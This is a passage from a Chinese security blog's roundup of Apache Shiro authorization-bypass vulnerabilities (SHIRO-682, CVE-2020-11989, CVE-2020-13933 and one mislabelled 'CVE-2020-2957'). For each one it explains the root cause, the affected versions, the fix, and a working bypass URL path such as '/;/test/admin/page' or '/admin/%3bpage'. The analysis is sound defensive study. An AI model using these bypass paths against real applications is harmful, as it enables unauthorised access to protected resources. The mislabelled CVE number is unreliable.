<p>​        而Shiro 的Ant格式的<strong>pathPattern</strong> 中的的“*”通配符是不支持匹配路径的，所以/hello/*****不能成功匹配/hello/1/，也就不会触发authc拦截器进行权限拦截。从而成功绕过了Shiro拦截器，而后再进入到spring拦截器中，/hello/1/与/hello/1能获取到相同的资源。</p>
<p><strong>【关系链】</strong>：<strong>PathMatchingFilterChainResolver（url处理）⟶ getChain函数（权限判定）⟶ pathMatches函数（url匹配）⟶pathPattern匹配失败而绕过shiro拦截器。</strong></p>
<p>{“⟶”代表引用/调用关系}</p>
<h3 id="0x03-漏洞环境-测绘指纹"><a href="#0x03-漏洞环境-测绘指纹" class="headerlink" title="0x03 漏洞环境/测绘指纹"></a>0x03 漏洞环境/测绘指纹</h3><ul>
<li>JIRA     issueSHIRO-682</li>
<li>Shiro     &lt; 1.5.0</li>
</ul>
<h3 id="0x04-POC-EXP-漏洞利用"><a href="#0x04-POC-EXP-漏洞利用" class="headerlink" title="0x04 POC/EXP/漏洞利用"></a>0x04 POC/EXP/漏洞利用</h3><p>​        /*<em>可以匹配/hello，但匹配不到/hello/；因为</em>通配符无法匹配路径。假设/hello接口设置了authc拦截器，访问/hello将会被进行权限判断，如果请求的URI为/hello/，/*URL路径表达式将无法正确匹配，就会放行。然后进入到spring(Servlet)拦截器，spring中/hello形式和/hello/形式的URL访问的资源是一样的。</p>
<h3 id="0x05漏洞修复"><a href="#0x05漏洞修复" class="headerlink" title="0x05漏洞修复"></a>0x05漏洞修复</h3><p>​        shiro1.5版本修复了pathsMatch函数。修复方式是通过判断requestURI是否以/为结尾，如果以/结尾的话，则去掉尾部的/符号在与URL表达式进行比较。</p>
<p>​        那么，当requestURI为/hello/1/等以/为结尾的URI的时候，都会被清除最后的/号，再进行URL路径匹配，那么/hello/1/就会被处理为/hello/1，然后需要授权认证才能访问。</p>
<h2 id="Apache-Shiro-628权限绕过漏洞-（CVE-2020-2957）"><a href="#Apache-Shiro-628权限绕过漏洞-（CVE-2020-2957）" class="headerlink" title="Apache Shiro 628权限绕过漏洞 （CVE-2020-2957）"></a>Apache Shiro 628权限绕过漏洞 （CVE-2020-2957）</h2><h3 id="0x01-漏洞介绍-3"><a href="#0x01-漏洞介绍-3" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h3><p>​        CVE-2020-1957身份认证绕过漏洞修复不完全，CVE-2020-2957是漏洞在之前CVE-2020-1957补丁的基础上进行绕过，访问/hello/1/会进入登录认证，但是通过构造payload:/fdsf;/…/hello/1可以绕过登录认证。</p>
<h3 id="0x02-漏洞环境-测绘指纹-3"><a href="#0x02-漏洞环境-测绘指纹-3" class="headerlink" title="0x02 漏洞环境/测绘指纹"></a>0x02 漏洞环境/测绘指纹</h3><ul>
<li>Shiro     &lt;= 1.5.1</li>
</ul>
<h3 id="0x03漏洞原理"><a href="#0x03漏洞原理" class="headerlink" title="0x03漏洞原理"></a>0x03漏洞原理</h3><p>​        问题定位到getChain函数中对于requestURI的获取会调用getPathWithinApplication函数。如果输入**/fdsf;/../hello/1<strong>，getPathWithinApplication(request)获取的requestURI为</strong>/fdsf**，而不是我们输入的/fdsf;/../hello/1，从而导致后面的URI路径模式匹配返回False，从而再次绕过了shiro拦截器。</p>
<p>​        getPathWithinApplication函数中会调用WebUtils (org.apache.shiro.web.util)中的getRequestUri函数获取RequestUri。</p>
<p>RequestUri函数中最终调用decodeAndCleanUriString函数对URI进行清洗。</p>
<p>​        如果URI中存在;号的话，则会删除其后面的所有字符。/fdsf;/../hello/1/最终也就变成了/fdsf。</p>
<p><strong>【关系链】</strong>：<strong>getChain函数（权限判定）</strong></p>
<p><strong>⟶ getPathWithinApplication函数（获取完整url：http://… /fdsf;/../hello/1）</strong></p>
<p>⟶ <strong>WebUtils的getRequestUri函数（获取RequestUri：/fdsf;/../hello/1）</strong></p>
<p>⟶ <strong>decodeAndCleanUriString函数（url清洗）：如果URI中存在;号的话，则会删除其后面的所有字符,得到/fdsf。</strong></p>
<p><strong>⟶ 绕过shiro拦截器。</strong></p>
<h3 id="0x04-POC-EXP-漏洞利用-1"><a href="#0x04-POC-EXP-漏洞利用-1" class="headerlink" title="0x04 POC/EXP/漏洞利用"></a>0x04 POC/EXP/漏洞利用</h3><p>​        输入/fdsf;/../hello/1，getPathWithinApplication(request)获取的requestURI为/fdsf，而不是我们输入的/fdsf;/../hello/1，从而导致后面的URI路径模式匹配返回False，从而再次绕过了shiro拦截器。</p>
<h3 id="0x05漏洞修复-1"><a href="#0x05漏洞修复-1" class="headerlink" title="0x05漏洞修复"></a>0x05漏洞修复</h3><p>​        Shiro1.52。获取requestURI的方式从request.getRequestUri直接获取的方式更改为获取request的ContextPath，ServletPath，PathInfo，然后再重新拼接而成。输入的/fdsf;/../hello/1/，将会被拼接为//hello/1/再进行URI路径匹配，则无法绕过拦截器。</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813183906465.png" alt="image-20230813183906465"></p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813183920110.png" alt="image-20230813183920110"></p>
<p>【<strong>知识补充</strong>】</p>
<p>例如：<a target="_blank" rel="noopener" href="http://127.0.0.1:8080/a/rooturl/b/test?c=1%EF%BC%8C%E5%85%B6%E4%B8%ADrooturl%E6%98%AF%E9%A1%B9%E7%9B%AE%E7%9A%84%E6%A0%B9%E7%9B%AE%E5%BD%95">http://127.0.0.1:8080/a/rooturl/b/test?c=1，其中rooturl是项目的根目录</a></p>
<ul>
<li><p> getServletPath()：获取能够与“url-pattern”中匹配的路径，注意是完全匹配的部分，*的部分不包括。                                                          # b/test</p>
</li>
<li><p>getPageInfo()：与getServletPath()获取的路径互补，能够得到的是“url-pattern”中*d的路径部分                                                                     #c=1</p>
</li>
<li><p>getContextPath()：获取项目的根路径                                # /a/rooturl</p>
</li>
<li><p>getRequestURI()：获取根路径到地址结尾                        #/a/rooturl/b/test?c=1</p>
</li>
<li><p>getRequestURL()：获取请求的地址链接（输入的地址）#<a target="_blank" rel="noopener" href="http://127.0.0.1:8080/a/rooturl/b/test?c=1">http://127.0.0.1:8080/a/rooturl/b/test?c=1</a></p>
</li>
<li><p>getServletContext().getRealPath(“/”)：获取“/”在机器中的实际地址</p>
</li>
<li><p>getServerName():获取的是域名(xxx.com)</p>
</li>
</ul>
<h2 id="Apache-Shiro权限绕过漏洞分析-CVE-2020-11989"><a href="#Apache-Shiro权限绕过漏洞分析-CVE-2020-11989" class="headerlink" title="Apache Shiro权限绕过漏洞分析(CVE-2020-11989)"></a>Apache Shiro权限绕过漏洞分析(CVE-2020-11989)</h2><h3 id="0x01-漏洞介绍-4"><a href="#0x01-漏洞介绍-4" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h3><p>​        总结来说就是当URL进入到Tomcat时，Tomcat判断**/;test/admin/page** 为test应用下的**/admin/page**路由，进入到Shiro时被;截断被认作为/,再进入Spring时又被正确处理为test应用下的/admin/page路由，最后导致shiro的权限绕过。</p>
<h3 id="0x02-漏洞环境-测绘指纹-4"><a href="#0x02-漏洞环境-测绘指纹-4" class="headerlink" title="0x02 漏洞环境/测绘指纹"></a>0x02 漏洞环境/测绘指纹</h3><ul>
<li><p>Apache Shiro &lt; 1.5.3</p>
</li>
<li><p>Spring 框架中只使用 Shiro 鉴权</p>
</li>
<li><p>应用不能部署在根目录，如果为根目录则context-path为空，就会被CVE-2020-1957的patch将URL格式化，即Shiro获取的url与Web框架处理url不一致的情况就能造成权限绕过。若Shiro版本小于1.5.2的话那么该条件就不需要，因为1.5.2版本前，requestURI是直接获取方式，而不是通过getContextPath() 、getServletPath()、getPathInfo()获取并拼接得到。</p>
</li>
</ul>
<h3 id="0x03-漏洞原理"><a href="#0x03-漏洞原理" class="headerlink" title="0x03 漏洞原理"></a>0x03 漏洞原理</h3><p>以输入<font color="red">/;/test/admin/page</font>为例, 若<font color="red">admin/page</font>是授权访问目录,<font color="red">/;/test</font> 是根目录：</p>
<ul>
<li><p>由（CVE-2020-2957）修补方式可知；requestURI的获取方式为通过getContextPath() 、getServletPath()、getPathInfo()获取并拼接得到，获取到的requestURI为/;/test//admin/page。</p>
</li>
<li><p>然后传入decodeAndCleanUriString，根据“；”进行URL截断，所以最终返回了/，传入后decodeAndCleanUriString变成了/。</p>
</li>
</ul>
<p>（由于“/”不是禁止访问目录，所以可以绕过shiro鉴权拦截器）</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184309614.png" alt="image-20230813184309614"></p>
<p><strong>contextPath</strong>:/;/test,     应用不能部署在根目录，也就是需要context-path，server.servlet.context-path=/test;</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184327784.png" alt="image-20230813184327784"></p>
<p>getRequestUri 获取到的是:”/”</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184344695.png" alt="image-20230813184344695"></p>
<p>decodeAndCleanUriString():/</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184353276.png" alt="image-20230813184353276"></p>
<ul>
<li><p><strong>/;/test//admin/page</strong>传入spring控制器（此版本没有权限校验），由getPathWithinServletMapping()格式化处理后，最后返回**/admin/page**，成功访问未授权目录。</p>
<p>contextPath:/;/test</p>
<p>PathwithinApp：/test/admin/page</p>
<p>ServeletPath：/admin/page</p>
</li>
</ul>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813184437756.png" alt="image-20230813184437756"></p>
<p>【<strong>关系链</strong>】</p>
<ul>
<li> <strong>Shiro鉴权器</strong></li>
</ul>
<p><strong>getChain函数（权限判定）</strong></p>
<p><strong>⟶ getPathWithinApplication函数（获取完整url：<font color="red">http://… /;/test/admin/page</font>）</strong></p>
<p><strong>⟶ getRequestUri函数（获取RequestUri：<font color="red">/;/test//admin/page</font>）</strong></p>
<p><strong>⟶ decodeAndCleanUriString函数（url清洗）：如果URI中存在;号的话，则会删除其后面的所有字符,得到<font color="red">/</font></strong></p>
<p>⟶ <strong>绕过shiro鉴权器</strong></p>
<ul>
<li><strong>spring控制器</strong></li>
</ul>
<p><strong>RequestUri（ <font color="red">/;/test//admin/page</font>）传入 spring控制器</strong></p>
<p><strong>⟶ getPathWithinServletMapping()</strong></p>
<p><strong>⟶ServeletPath：<font color="red">/admin/page</font></strong></p>
<p><strong>⟶访问/admin/page</strong></p>
<h3 id="0x04-POC-EXP-漏洞利用-2"><a href="#0x04-POC-EXP-漏洞利用-2" class="headerlink" title="0x04 POC/EXP/漏洞利用"></a>0x04 POC/EXP/漏洞利用</h3><p>​        只要根据漏洞环境去构造payload地址即可。例如如果直接访问 /test/admin/page，会返回302跳转要求登录，访问 /;/test/admin/page, 就能直接绕过Shiro权限验证，访问到/admin路由中的信息</p>
<h3 id="0x05-漏洞修复"><a href="#0x05-漏洞修复" class="headerlink" title="0x05 漏洞修复"></a>0x05 漏洞修复</h3><p>​        Shiro 1.5.3修改了URL获取的逻辑，不单独处理context-path，（单独处理时可以在判断context-path时进行绕过）<br> org.apache.shiro.web.util.WebUtils#getPathWithinApplication</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185051542.png" alt="image-20230813185051542"></p>
<p>因此就无法再通过构造context-path的方式来进行绕过了。</p>
<h2 id="Apache-Shiro-权限绕过漏洞（CVE-2020-13933）"><a href="#Apache-Shiro-权限绕过漏洞（CVE-2020-13933）" class="headerlink" title="Apache Shiro 权限绕过漏洞（CVE-2020-13933）"></a>Apache Shiro 权限绕过漏洞（CVE-2020-13933）</h2><h3 id="0x01-漏洞介绍-5"><a href="#0x01-漏洞介绍-5" class="headerlink" title="0x01 漏洞介绍"></a>0x01 漏洞介绍</h3><p>​        Apache Shiro的CVE-2020-11989修补补丁依旧存在缺陷，由于shiro和spring在处理url中仍然存在差别，通过构造特殊的HTTP请求，可以再次绕过授权，访问未授权的信息。访问/read/xx，被302重定向到了/login,而访问/read/%3bxxx，能够绕过认证。</p>
<h3 id="0x02-漏洞环境-测绘指纹-5"><a href="#0x02-漏洞环境-测绘指纹-5" class="headerlink" title="0x02 漏洞环境/测绘指纹"></a>0x02 漏洞环境/测绘指纹</h3><ul>
<li>Apache Shiro &lt; 1.6.0</li>
<li> Spring 框架中只使用 Shiro 鉴权</li>
</ul>
<h3 id="0x03漏洞原理-1"><a href="#0x03漏洞原理-1" class="headerlink" title="0x03漏洞原理"></a>0x03漏洞原理</h3><p>【<strong>key</strong>】shiro和spring在处理url中仍然存在差别</p>
<p>假设条件：**/admin/{name}<strong>是授权访问目录（</strong>/admin**不需要授权访问）</p>
<p>【<strong>shiro处理URI</strong>】</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185238889.png" alt="image-20230813185238889"></p>
<p>若输入：**/admin/%3bpage**</p>
<p>传入/admin/%3bpage 解码后为**/admin/;bpage** ，传入removeSenicolon（）</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185337503.png" alt="image-20230813185337503"></p>
<p>removeSenicolon()根据“；”分隔符进行截取，返回**/admin/**到requestURI。</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185354022.png" alt="image-20230813185354022"></p>
<p>此处因为/admin/没有匹配到具体资源路径（不需要授权访问），所以通过过滤器到达Spring的处理逻辑。</p>
<p>【<strong>spring处理URI</strong>】</p>
<p>​        注意这里Spring的处理逻辑为先去判断URI中是否存在“；”等特殊字符，如果存在就先处理（删除）再匹配路径。（没有先编码再判断是否存在特殊符号）</p>
<p>getPathWithinApplication()传入getRequestUrl的是<font color="red">/admin/%3bpage</font> <img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185455706.png" alt="image-20230813185455706"></p>
<p>DecodeAndCleanUriString()清洗数据的时候，removeSemicolonContentInternal()清洗模块没有进行编码“%3b”，即没有发现“；”，所以返回结果是**/admin/%3bpage<strong>。然后到decodeRequestString()进行解码得到</strong>/admin/;page**.</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185548331.png" alt="image-20230813185548331"></p>
<p>removeSemicolonContentInternal()执行细节</p>
<p><img src="/2023/08/13/shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/image-20230813185555497.png" alt="image-20230813185555497"></p>
<p><strong>/admin/;page</strong>之后进行匹配为**/admin/page**，从而获取相应资源。</p>
<h3 id="0x04-POC-EXP-漏洞利用-3"><a href="#0x04-POC-EXP-漏洞利用-3" class="headerlink" title="0x04 POC/EXP/漏洞利用"></a>0x04 POC/EXP/漏洞利用</h3><p>​        由于shiro和spring在处理url中仍然存在差别，通过构造特殊的HTTP请求，可以再次绕过授权，访问未授权的信息。访问/admin/xx，被302重定向到了/login,而访问/read/%3bxxx，能够绕过认证，直接访问/read/xxx。</p>
<h3 id="0x05-漏洞修补"><a href="#0x05-漏洞修补" class="headerlink" title="0x05 漏洞修补"></a>0x05 漏洞修补</h3><p>​        添加一个一个InvalidRequestFilter类，该类从全局上对分号，反斜杠和非ASCII字符进行了过滤。</p>
<p>参考文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/emgexgb_sef/article/details/123863818">https://blog.csdn.net/emgexgb_sef/article/details/123863818</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%AE%9E%E6%88%98%E6%BC%8F%E6%B4%9E/" rel="tag"># 实战漏洞</a>
              <a href="/tags/%E6%94%BB%E9%98%B2%E6%BC%94%E7%BB%83/" rel="tag"># 攻防演练</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/08/13/%E7%99%BB%E5%BD%95%E7%95%8C%E9%9D%A2%E7%9A%84%E5%88%A9%E7%94%A8%E5%A7%BF%E5%8A%BF/" rel="prev" title="登录界面的利用姿势">
      <i class="fa fa-chevron-left"></i> 登录界面的利用姿势
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/08/13/SpringBoot%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/" rel="next" title="实战|SpringBoot敏感信息泄露">
      实战|SpringBoot敏感信息泄露 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88"><span class="nav-number">1.</span> <span class="nav-text">Shiro反序列漏洞集合</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D%E4%B8%8E%E7%9F%A5%E8%AF%86%E8%A1%A5%E5%85%85"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞介绍与知识补充</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RememberMe-RCE-550%EF%BC%88CVE-2016-4437%EF%BC%89"><span class="nav-number">1.2.</span> <span class="nav-text">RememberMe RCE-550（CVE-2016-4437）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D-%E5%8E%9F%E7%90%86"><span class="nav-number">1.2.1.</span> <span class="nav-text">0x01 漏洞介绍&#x2F;原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9"><span class="nav-number">1.2.2.</span> <span class="nav-text">0x02 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.2.3.</span> <span class="nav-text">0x03 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%BF%9C%E7%A8%8B%E5%AE%89%E5%85%A8%E9%99%90%E5%88%B6%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2016-6802%EF%BC%89"><span class="nav-number">1.3.</span> <span class="nav-text">远程安全限制绕过漏洞（CVE-2016-6802）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.3.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9-1"><span class="nav-number">1.3.2.</span> <span class="nav-text">0x02 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-1"><span class="nav-number">1.3.3.</span> <span class="nav-text">0x03 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Padding-Oracle-AttackRCE-721%EF%BC%88CVE-2019-12422%EF%BC%89"><span class="nav-number">1.4.</span> <span class="nav-text">Padding Oracle AttackRCE-721（CVE-2019-12422）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D-1"><span class="nav-number">1.4.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9-2"><span class="nav-number">1.4.2.</span> <span class="nav-text">0x02 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-2"><span class="nav-number">1.4.3.</span> <span class="nav-text">0x03 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Shiro-spring%E6%97%B6%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%EF%BC%88CVE-2020-1957%EF%BC%89"><span class="nav-number">1.5.</span> <span class="nav-text">Shiro + spring时身份验证绕过漏洞分析（CVE-2020-1957）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D-2"><span class="nav-number">1.5.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">1.5.2.</span> <span class="nav-text">0x02 漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9"><span class="nav-number">1.5.3.</span> <span class="nav-text">0x03 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-number">1.5.4.</span> <span class="nav-text">0x04 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="nav-number">1.5.5.</span> <span class="nav-text">0x05漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Apache-Shiro-628%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E-%EF%BC%88CVE-2020-2957%EF%BC%89"><span class="nav-number">1.6.</span> <span class="nav-text">Apache Shiro 628权限绕过漏洞 （CVE-2020-2957）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D-3"><span class="nav-number">1.6.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9-3"><span class="nav-number">1.6.2.</span> <span class="nav-text">0x02 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">1.6.3.</span> <span class="nav-text">0x03漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-1"><span class="nav-number">1.6.4.</span> <span class="nav-text">0x04 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-1"><span class="nav-number">1.6.5.</span> <span class="nav-text">0x05漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Apache-Shiro%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-CVE-2020-11989"><span class="nav-number">1.7.</span> <span class="nav-text">Apache Shiro权限绕过漏洞分析(CVE-2020-11989)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D-4"><span class="nav-number">1.7.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9-4"><span class="nav-number">1.7.2.</span> <span class="nav-text">0x02 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">1.7.3.</span> <span class="nav-text">0x03 漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-2"><span class="nav-number">1.7.4.</span> <span class="nav-text">0x04 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="nav-number">1.7.5.</span> <span class="nav-text">0x05 漏洞修复</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Apache-Shiro-%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2020-13933%EF%BC%89"><span class="nav-number">1.8.</span> <span class="nav-text">Apache Shiro 权限绕过漏洞（CVE-2020-13933）</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D-5"><span class="nav-number">1.8.1.</span> <span class="nav-text">0x01 漏洞介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83-%E6%B5%8B%E7%BB%98%E6%8C%87%E7%BA%B9-5"><span class="nav-number">1.8.2.</span> <span class="nav-text">0x02 漏洞环境&#x2F;测绘指纹</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86-1"><span class="nav-number">1.8.3.</span> <span class="nav-text">0x03漏洞原理</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-POC-EXP-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-3"><span class="nav-number">1.8.4.</span> <span class="nav-text">0x04 POC&#x2F;EXP&#x2F;漏洞利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-%E6%BC%8F%E6%B4%9E%E4%BF%AE%E8%A1%A5"><span class="nav-number">1.8.5.</span> <span class="nav-text">0x05 漏洞修补</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">北极星上的稻草人</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">87</span>
          <span class="site-state-item-name">日志</span>
